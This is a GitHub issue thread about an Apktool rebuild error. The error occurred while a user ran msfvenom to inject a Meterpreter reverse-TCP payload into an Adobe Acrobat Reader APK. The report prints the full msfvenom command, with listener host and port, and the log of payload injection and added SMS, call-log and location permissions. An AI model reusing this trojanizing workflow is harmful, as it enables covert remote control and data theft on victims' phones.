Apktool icon indicating copy to clipboard operation
Apktool copied to clipboard

Published 20 hours ago verified publisher icon iBotPeaches

[BUG]brut.common.BrutException: could not exec

Open TheBigBossYoyo opened this issue 2 years ago • 6 comments
trafficstars

Information

  1. Apktool Version (apktool -version) -2.7.0
  2. Operating System (Mac, Linux, Windows) -Kali Linux
  3. APK From? (Playstore, ROM, Other) -Apkcombo
  4. Java Version (java --version) -java --version openjdk 17.0.6 2023-01-17 OpenJDK Runtime Environment (build 17.0.6+10-Debian-1) OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)

Stacktrace/Logcat

Using APK template: Adobe Acrobat Reader_23.7.0.28525.Beta_apkcombo.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.adobe.reader.sixpa
[*] Loading /tmp/d20230720-145046-ntqmfq/original/smali_classes2/com/adobe/reader/ARProdApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230720-145046-ntqmfq/output.apk
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether resources has changed...
I: Building resources...
W: invalid resource directory name: /tmp/d20230720-145046-ntqmfq/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_182227548664954999358334969126464036409.tmp, p, --forced-package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1928328525, --version-name, 23.7.0.28525.Beta, --no-version-vectors, -F, /tmp/APKTOOL17400763258487642668.tmp, -e, /tmp/APKTOOL12902561713408612721.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20230720-145046-ntqmfq/original/res, -M, /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml]
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.7.0
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml:1056: error: '@2114191360' is incompatible with attribute resource (attr) reference.
W: error: failed processing manifest.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_93107876177108327297519278226192524222.tmp, link, -o, /tmp/APKTOOL9392890766304539922.tmp, --package-id, 127, --min-sdk-version, 24, --target-sdk-version, 33, --version-code, 1928328525, --version-name, 23.7.0.28525.Beta, --no-auto-version, --no-version-vectors, --no-version-transitions, --no-resource-deduping, --allow-reserved-package-id, -e, /tmp/APKTOOL1809429853351183989.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, --manifest, /tmp/d20230720-145046-ntqmfq/original/AndroidManifest.xml, /tmp/d20230720-145046-ntqmfq/original/build/resources.zip]
Error: Unable to rebuild apk with apktool

Steps to Reproduce

  1. msfvenom -x Adobe\ Acrobat\ Reader_23.7.0.28525.Beta_apkcombo.com.apk -p android/meterpreter/reverse_tcp LHOST=192.168.1.136 LPORT=4444 -o Adobe-acrobat.apk

Frameworks

If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files (.apks that live in /system/framework or /system/priv-app)

APK

If this APK can be freely shared, please upload/attach a link to it. https://apkcombo.com/fr/adobe-acrobat-reader/com.adobe.reader/download/apk

Questions to ask before submission

  1. Have you tried apktool d, apktool b without changing anything? No
  2. If you are trying to install a modified apk, did you resign it?Yes
  3. Are you using the latest apktool version?Yes

TheBigBossYoyo avatar Jul 20 '23 14:07 TheBigBossYoyo

This might be related to https://github.com/iBotPeaches/Apktool/issues/2514, but I am also learning with my recent investigations that we might need to introduce an unknown type of resource.

What is happening there is we can't find that resource in your example (0x7E040000) thus its getting serialized as the decimal value (2114191360) and dropped into the manifest.

So the questions here are.

  • Why couldn't we find/resolve 0x7E040000?
  • What do we type/place if we can't resolve a reference?
  • Should we strip/remove an attribute if we can't resolve it?

iBotPeaches avatar Jul 20 '23 14:07 iBotPeaches

So what can I do to resolve ?

TheBigBossYoyo avatar Jul 20 '23 14:07 TheBigBossYoyo

So what can I do to resolve ?

I'm lost - doesn't my reply answer what we need to research/do in order to resolve? I'm not sure how I can reword that.

iBotPeaches avatar Jul 20 '23 14:07 iBotPeaches

Oh ok sorry

TheBigBossYoyo avatar Jul 20 '23 14:07 TheBigBossYoyo

When you find a solution feel free to ping me

TheBigBossYoyo avatar Jul 20 '23 14:07 TheBigBossYoyo

I have faced the same problem with apktool 2.8.1 on binance apk (https://www.binance.com/en/download), the same way as #3303

From what I have searched, actually the attrs.xml holds an entry for the id, but the name of the attr comes also as an id. I am not sure that its an error on decompilation because investigating with jadx the same happens in attrs.xml.

Back to apktool, in brut.apktool/apktool.lib/src/main/java/brut/androidlib/res/decoder/AXmlResourceParser.java - line 365 it verifies first if we have a non-null resourceMapValue, otherwise goes to stringBlockValue. I bypassed the error by checking if the resourceMaValue starts with a number, to use the stringBlockValue in this case too.

if (resourceMapValue != null && !resourceMapValue.matches("^([0-9])+"))

cpereirarafa avatar Aug 31 '23 08:08 cpereirarafa